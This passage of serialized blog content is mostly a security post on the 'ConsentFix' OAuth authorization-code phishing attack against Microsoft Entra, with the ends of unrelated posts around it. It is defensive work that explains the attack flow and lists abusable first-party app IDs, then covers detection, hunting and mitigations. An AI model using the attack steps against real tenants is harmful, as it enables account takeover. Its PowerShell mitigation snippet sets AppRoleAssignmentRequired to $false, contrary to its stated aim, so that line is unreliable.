",[813,5886,5889],{"href":5887,"rel":5888},"https://www.pingcastle.com/",[1509],"PingCastle",[813,5891,5894],{"href":5892,"rel":5893},"https://www.semperis.com/purple-knight/",[1509],"Purple Knight"," to assess your AD security posture and identify control path exposures.",[4547,5897,5898],{},"\ncode {\n  font-size: inherit\n}\n",{"title":927,"searchDepth":928,"depth":928,"links":5900},[5901,5902,5903,5904,5907,5911],{"id":5259,"depth":928,"text":5260},{"id":5304,"depth":928,"text":5305},{"id":5403,"depth":928,"text":5404},{"id":5444,"depth":928,"text":5445,"children":5905},[5906],{"id":5454,"depth":935,"text":5455},{"id":5566,"depth":928,"text":5567,"children":5908},[5909,5910],{"id":5616,"depth":935,"text":5617},{"id":5814,"depth":935,"text":5815},{"id":5874,"depth":928,"text":5875},{"lang":940,"seoTitle":5913,"titleClass":942,"date":5914,"blogtitlepic":5915,"socialimg":5916,"customExcerpt":5917,"keywords":5918,"hreflang":5919,"scripts":5926,"asideNav":5927,"maxContent":511,"published":511},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[5920,5922,5924],{"lang":4,"href":5921},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":1028,"href":5923},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":940,"href":5925},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":511,"form":511},{"menuItems":5928},[5929,5931,5933,5935,5937],{"href":5930,"text":5260},"#tldr-what-if-we-remove-the-downsides",{"href":5932,"text":5305},"#why-do-we-care-now",{"href":5934,"text":5404},"#but-why-is-no-one-doing-it",{"href":5936,"text":5445},"#show-me-this-no-regrets-option",{"href":5938,"text":5875},"#conclusions","/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":5253,"description":927},"posts/2026-03-01-exchange-ad-split-permissions-hardening","hkisfzda-zMxfXpTjbzW6AZQFWGFz-dDIiiCtNCVq_8",{"id":5944,"title":5945,"author":5946,"body":5947,"cta":767,"description":5951,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":6729,"moment":6731,"navigation":511,"path":6757,"seo":6758,"stem":6759,"tags":6760,"webcast":752,"__hash__":6763},"content_en/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[1255,1136,1291],{"type":806,"value":5948,"toc":6709},[5949,5952,5955,5958,5964,5967,5970,5979,5984,5992,6012,6015,6021,6024,6027,6033,6038,6042,6052,6058,6061,6064,6068,6071,6077,6084,6087,6107,6117,6121,6124,6127,6130,6133,6137,6140,6143,6160,6169,6173,6177,6197,6201,6206,6217,6220,6226,6230,6244,6248,6259,6263,6266,6274,6277,6285,6288,6296,6300,6303,6324,6327,6391,6394,6397,6400,6403,6406,6412,6415,6456,6460,6475,6479,6483,6497,6500,6503,6508,6511,6522,6526,6533,6537,6543,6548,6562,6568,6574,6580,6591,6594,6600,6603,6628,6636,6640,6660,6666,6669,6675,6679],[809,5950,5951],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[809,5953,5954],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[809,5956,5957],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[809,5959,5960],{},[838,5961],{"alt":5962,"src":5963},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[809,5965,5966],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[809,5968,5969],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[809,5971,5972,5973,5978],{},"You can easily reproduce this yourself, for example by using ",[813,5974,5977],{"href":5975,"rel":5976},"https://github.com/f-bader/TokenTacticsV2",[1509],"TokenTacticsV2",", or by crafting the URI manually.",[809,5980,5981],{},[838,5982],{"alt":5977,"src":5983},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[809,5985,5986,5987,5991],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[813,5988,5989],{"href":5989,"rel":5990},"http://localhost:3001",[1509],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[1648,5993,5994,6004],{},[1652,5995,5996,5998,6000,6001,6003],{},[1655,5997,2499],{},[2959,5999],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[2959,6002],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[1652,6005,6006,6009,6011],{},[1655,6007,6008],{},"state",[2959,6010],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[809,6013,6014],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[809,6016,6017],{},[838,6018],{"alt":6019,"src":6020},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[809,6022,6023],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[809,6025,6026],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[809,6028,6029],{},[838,6030],{"alt":6031,"src":6032},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[892,6034,6035],{},[809,6036,6037],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[819,6039,6041],{"id":6040},"detection-artifacts","Detection artifacts",[809,6043,6044,6045,2261,6048,6051],{},"When you reproduce the attack and check the ",[2499,6046,6047],{},"SigninLogs",[2499,6049,6050],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[809,6053,6054],{},[838,6055],{"alt":6056,"src":6057},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[809,6059,6060],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[809,6062,6063],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[897,6065,6067],{"id":6066},"missing-link","Missing link",[809,6069,6070],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[809,6072,6073],{},[838,6074],{"alt":6075,"src":6076},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[809,6078,6079,6080,6083],{},"However, the ",[2499,6081,6082],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[809,6085,6086],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[1648,6088,6089,6092,6095,6098,6101,6104],{},[1652,6090,6091],{},"Both events share the same SessionId",[1652,6093,6094],{},"Both events share the same ApplicationId",[1652,6096,6097],{},"Both events share the same UserId",[1652,6099,6100],{},"The second event must be after the first event",[1652,6102,6103],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[1652,6105,6106],{},"You should only consider the very next second event, not subsequent ones",[892,6108,6109],{},[809,6110,6111,6114,6116],{},[1655,6112,6113],{},"Fun fact",[2959,6115],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. The targeted application ID cannot be changed.",[819,6118,6120],{"id":6119},"reduce-the-noise","Reduce the noise",[809,6122,6123],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[809,6125,6126],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[809,6128,6129],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[809,6131,6132],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[819,6134,6136],{"id":6135},"affected-first-party-applications","Affected first-party applications",[809,6138,6139],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[809,6141,6142],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[1648,6144,6145,6148,6151,6154,6157],{},[1652,6146,6147],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[1652,6149,6150],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[1652,6152,6153],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[1652,6155,6156],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[1652,6158,6159],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[809,6161,6162,6163,6168],{},"A full list of these apps are now included in ",[813,6164,6167],{"href":6165,"rel":6166},"https://entrascopes.com/?authcodeFix=true",[1509],"EntraScopes.com"," by our colleague Fabian Bader.",[819,6170,6172],{"id":6171},"mitigations-and-protections","Mitigations and Protections",[897,6174,6176],{"id":6175},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[2489,6178,6181,6184,6185,6187,6190,6191,6193,6196],{"className":6179},[6180],"option-block",[1655,6182,6183],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[2959,6186],{},[1655,6188,6189],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[2959,6192],{},[1655,6194,6195],{},"Scope:"," limited\n",[897,6198,6200],{"id":6199},"option-1-require-user-assignment","Option 1: Require User Assignment",[6202,6203,6205],"h4",{"id":6204},"pre-requisites","Pre-requisites:",[1648,6207,6208,6211,6214],{},[1652,6209,6210],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[1652,6212,6213],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[1652,6215,6216],{},"Establish a process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[4547,6218,6219],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[2493,6221,6223],{"className":6222},[2952],[2499,6224,6225],{},"\n// Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" // Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$false\n",[6202,6227,6229],{"id":6228},"benefit","Benefit:",[1648,6231,6232,6235,6238,6241],{},[1652,6233,6234],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[1652,6236,6237],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[1652,6239,6240],{},"Applied before evaluating Conditional Access policies.",[1652,6242,6243],{},"Limits the attack surface for other scenarios as well.",[6202,6245,6247],{"id":6246},"disadvantage","Disadvantage:",[1648,6249,6250,6253,6256],{},[1652,6251,6252],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[1652,6254,6255],{},"All legitimate CLI tool users must be identified",[1652,6257,6258],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[897,6260,6262],{"id":6261},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access Policies",[6202,6264,6205],{"id":6265},"pre-requisites-1",[1648,6267,6268,6271],{},[1652,6269,6270],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[1652,6272,6273],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[6202,6275,6229],{"id":6276},"benefit-1",[1648,6278,6279,6282],{},[1652,6280,6281],{},"Prevents token issuance for non-legitimate or non-privileged users.",[1652,6283,6284],{},"Allows granular scoping based on additional conditions such as device or network.",[6202,6286,6247],{"id":6287},"disadvantage-1",[1648,6289,6290,6293],{},[1652,6291,6292],{},"All legitimate CLI tool users must be identified and excluded.",[1652,6294,6295],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[897,6297,6299],{"id":6298},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[4547,6301,6302],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[2489,6304,6306,6309,6310,6312,6314,6315,6317,6314,6319,6321,6323],{"className":6305},[6180],[1655,6307,6308],{},"Option:"," Require Token Protection",[2959,6311],{},[1655,6313,6183],{}," High",[2959,6316],{},[1655,6318,6189],{},[2959,6320],{},[1655,6322,6195],{}," Very limited\n",[6202,6325,6205],{"id":6326},"pre-requisites-2",[1648,6328,6329,6332,6335,6354],{},[1652,6330,6331],{},"Microsoft Entra ID P1 licenses",[1652,6333,6334],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[1652,6336,6337,6338,883,6343,2261,6348,6353],{},"Enable Web Account Manager (WAM) in ",[813,6339,6342],{"href":6340,"rel":6341},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[1509],"Azure CLI",[813,6344,6347],{"href":6345,"rel":6346},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[1509],"Azure PowerShell",[813,6349,6352],{"href":6350,"rel":6351},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[1509],"Microsoft Graph PowerShell"," (default in latest versions)",[1652,6355,6356,6357],{},"Configure Conditional Access targeting:\n",[1648,6358,6359,6373,6380],{},[1652,6360,6361,6362],{},"Cloud App targeting to the following apps:\n",[1648,6363,6364,6367,6370],{},[1652,6365,6366],{},"Office 365 Exchange Online",[1652,6368,6369],{},"Office 365 SharePoint Online",[1652,6371,6372],{},"Microsoft Teams Services",[1652,6374,6375,6376,6379],{},"Client apps under ",[848,6377,6378],{},"Mobile apps and desktop clients"," to require Token Protection.",[1652,6381,6382,6383,6386,6387,6390],{},"Select ",[848,6384,6385],{},"Windows"," as ",[848,6388,6389],{},"device platform"," for targeting the policy",[6202,6392,6229],{"id":6393},"benefit-2",[809,6395,6396],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[809,6398,6399],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code to token exchange",[809,6401,6402],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long the application can be protected by Token Protection.",[809,6404,6405],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[809,6407,6408],{},[838,6409],{"alt":6410,"src":6411},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[6202,6413,6247],{"id":6414},"disadvantage-2",[1648,6416,6417,6447,6450,6453],{},[1652,6418,6419,6420],{},"Only the following resources are officially supported:\n",[1648,6421,6422,6424,6426],{},[1652,6423,6366],{},[1652,6425,6369],{},[1652,6427,6372,6428,6430,6432,6433,2261,6436,6440,6441,6446],{},[2959,6429],{},[2959,6431],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. “Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[813,6434,6342],{"href":6340,"rel":6435},[1509],[813,6437,6347],{"href":6438,"rel":6439},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[1509],") support WAM which is a client-side requirement to use Token Protection. Microsoft has been announced ",[813,6442,6445],{"href":6443,"rel":6444},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[1509],"in a blog post"," to extend token protection capabilities for Azure management scenarios.",[1652,6448,6449],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[1652,6451,6452],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also effect productivity access to Microsoft 365.",[1652,6454,6455],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[897,6457,6459],{"id":6458},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[2489,6461,6463,6465,6466,6468,6465,6470,6472,6474],{"className":6462},[6180],[1655,6464,6183],{}," Medium",[2959,6467],{},[1655,6469,6189],{},[2959,6471],{},[1655,6473,6195],{}," Broad\n",[897,6476,6478],{"id":6477},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[6202,6480,6482],{"id":6481},"pre-requisite","Pre-requisite:",[1648,6484,6485,6488,6491,6494],{},[1652,6486,6487],{},"Entra ID P1 license",[1652,6489,6490],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Androind and iOS platform",[1652,6492,6493],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[1652,6495,6496],{},"Conditional Access Policy to enforce network compliant check should be applied to all cloud apps",[6202,6498,6229],{"id":6499},"benefit-3",[809,6501,6502],{},"Block additional token issuance by enforcing a trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[892,6504,6505],{},[809,6506,6507],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[6202,6509,6247],{"id":6510},"disadvantage-3",[1648,6512,6513,6516,6519],{},[1652,6514,6515],{},"Only applicable for users and devices with deployed Global Secure Access client",[1652,6517,6518],{},"Limited scope due to availability on Entra ID–integrated devices",[1652,6520,6521],{},"Enforcing Compliant Networks via CA will need some Exclusions like Intune to avoid chicken-egg-problems. Detailed testing is needed before rollout",[819,6523,6525],{"id":6524},"hunting-queries","Hunting queries",[809,6527,6528,6529,6532],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[2499,6530,6531],{},"NetworkAccessTraffic"," logs) and taking benefit of WAM authentication - we gain additional options for threat hunting and verification.",[897,6534,6536],{"id":6535},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[809,6538,6539,6540,6542],{},"This hunting query leverages ",[2499,6541,6531],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[892,6544,6545],{},[809,6546,6547],{},"This query works and delivers only reliable results when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[809,6549,6550,6553,6554,6557,6558,6561],{},[1655,6551,6552],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[2499,6555,6556],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[2499,6559,6560],{},"com.microsoft.CompanyPortalMac.ssoextension",") when using Platform SSO.",[809,6563,6564,6567],{},[1655,6565,6566],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). Attackers cannot issue further bounded tokens without PoP, so an unbounded refresh token is another strong indicator.",[809,6569,6570,6573],{},[1655,6571,6572],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[809,6575,6576,6579],{},[1655,6577,6578],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[1648,6581,6582,6585,6588],{},[1652,6583,6584],{},"Presence of a browser process initiating token requests.",[1652,6586,6587],{},"Detection and down grade to unbounded tokens.",[1652,6589,6590],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[809,6592,6593],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[809,6595,6596],{},[838,6597],{"alt":6598,"src":6599},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[809,6601,6602],{},"The following scoring will be shown depending on the conditions:",[809,6604,6605,6608,6609,6611,6612,6614,6616,6619,6620,6622,6624,6627],{},[1655,6606,6607],{},"A very high confidence score"," is displayed when ",[2499,6610,6531],{}," logs indicate a familiar browser process instead of initiating a token request, and a downgrade of an unbound token has been detected.",[2959,6613],{},[2959,6615],{},[1655,6617,6618],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[2959,6621],{},[2959,6623],{},[1655,6625,6626],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[809,6629,6630,6631,3436],{},"You’ll find the latest version of the hunting query on ",[813,6632,6635],{"href":6633,"rel":6634},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[1509],"GitHub",[897,6637,6639],{"id":6638},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[809,6641,6642,6643,6648,6649,6652,6653,6655,6656,6659],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[813,6644,6647],{"href":6645,"rel":6646},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[1509],"published a KQL function"," called ",[2499,6650,6651],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[2499,6654,6082],{}," can be correlated with suspicious ",[2499,6657,6658],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[809,6661,6662],{},[838,6663],{"alt":6664,"src":6665},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[809,6667,6668],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[809,6670,6671],{},[838,6672],{"alt":6673,"src":6674},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[819,6676,6678],{"id":6677},"further-reading","Further Reading",[1648,6680,6681,6688,6695,6702],{},[1652,6682,6683],{},[813,6684,6687],{"href":6685,"rel":6686},"https://pushsecurity.com/blog/consentfix",[1509],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[1652,6689,6690],{},[813,6691,6694],{"href":6692,"rel":6693},"https://youtu.be/AAiiIY-Soak",[1509],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[1652,6696,6697],{},[813,6698,6701],{"href":6699,"rel":6700},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[1509],"Microsoft identity platform and OAuth 2.0 authorization code flow",[1652,6703,6704],{},[813,6705,6708],{"href":6706,"rel":6707},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[1509],"Microsoft Azure CLI on entrascpes.com",{"title":927,"searchDepth":928,"depth":928,"links":6710},[6711,6714,6715,6716,6724,6728],{"id":6040,"depth":928,"text":6041,"children":6712},[6713],{"id":6066,"depth":935,"text":6067},{"id":6119,"depth":928,"text":6120},{"id":6135,"depth":928,"text":6136},{"id":6171,"depth":928,"text":6172,"children":6717},[6718,6719,6720,6721,6722,6723],{"id":6175,"depth":935,"text":6176},{"id":6199,"depth":935,"text":6200},{"id":6261,"depth":935,"text":6262},{"id":6298,"depth":935,"text":6299},{"id":6458,"depth":935,"text":6459},{"id":6477,"depth":935,"text":6478},{"id":6524,"depth":928,"text":6525,"children":6725},[6726,6727],{"id":6535,"depth":935,"text":6536},{"id":6638,"depth":935,"text":6639},{"id":6677,"depth":928,"text":6678},{"lang":940,"seoTitle":6730,"titleClass":942,"date":6731,"categories":6732,"blogtitlepic":6733,"socialimg":6734,"customExcerpt":6735,"keywords":6736,"hreflang":6737,"scripts":6742,"asideNav":6743,"maxContent":511,"published":511},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[373],"head-consentfix","/blog/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[6738,6740],{"lang":4,"href":6739},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":1028,"href":6741},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":511,"form":511},{"menuItems":6744},[6745,6747,6749,6751,6753,6755],{"href":6746,"text":6041},"#detection-artifacts",{"href":6748,"text":6120},"#reduce-the-noise",{"href":6750,"text":6136},"#affected-first-party-applications",{"href":6752,"text":6172},"#mitigations-and-protections",{"href":6754,"text":6525},"#hunting-queries",{"href":6756,"text":6678},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":5945,"description":5951},"posts/2025-12-31-vulnerability-consentfix",[6761,6762,435],"OAuth 2.0","Microsoft Entra ID","xzpMwGBNUXlIubvdm4TIQCBrKrDsD0jyYPi-h6OGCvk",{"id":6765,"title":6766,"author":6767,"body":6768,"cta":767,"description":6772,"eventid":767,"extension":937,"hideInRecent":752,"layout":938,"meta":6869,"moment":6870,"navigation":511,"path":6882,"seo":6883,"stem":6884,"tags":6885,"webcast":752,"__hash__":6887},"content_en/posts/2025-12-08-recruiting-process.md","Our Application Process Explained",[1313],{"type":806,"value":6769,"toc":6861},[6770,6773,6776,6779,6790,6794,6796,6799,6802,6806,6808,6811,6822,6825,6829,6831,6834,6838,6840,6843,6847,6849,6852,6856,6858],[809,6771,6772],{},"We're often asked: What do I need to bring and what's important to you?",[809,6774,6775],{},"What's important to us is that you're excited to work at an innovative tech company. We see ourselves as a team pulling in the same direction.",[809,6777,6778],{},"And we're looking for people who are as passionate about technology as we are:",[1648,6780,6781,6784,6787],{},[1652,6782,6783],{},"Who don't shy away from challenges but thrive when they can dive deep into complex topics.",[1652,6785,6786],{},"Who question the status quo and passionately develop new, innovative solutions – for glueckkanja and our clients.",[1652,6788,6789],{},"Who enjoy being part of a community, sharing their knowledge and learning from each other.",[897,6791,6793],{"id":6792},"step-1-your-application","Step 1: Your Application",[809,6795,825],{},[809,6797,6798],{},"You've submitted your documents – the first step is done! At our company, no AI reviews your application, but our recruiting team personally. Wondering who's behind the recruiting team? Here we are!",[809,6800,6801],{},"We - that's Kerstin, Anna, Steffi and Jan - take the time to carefully review your CV and check whether your experience and skills match our requirements. Our goal: You'll receive feedback from us within max. 1–2 weeks, but usually after just a few days. We know how nerve-wracking the waiting can 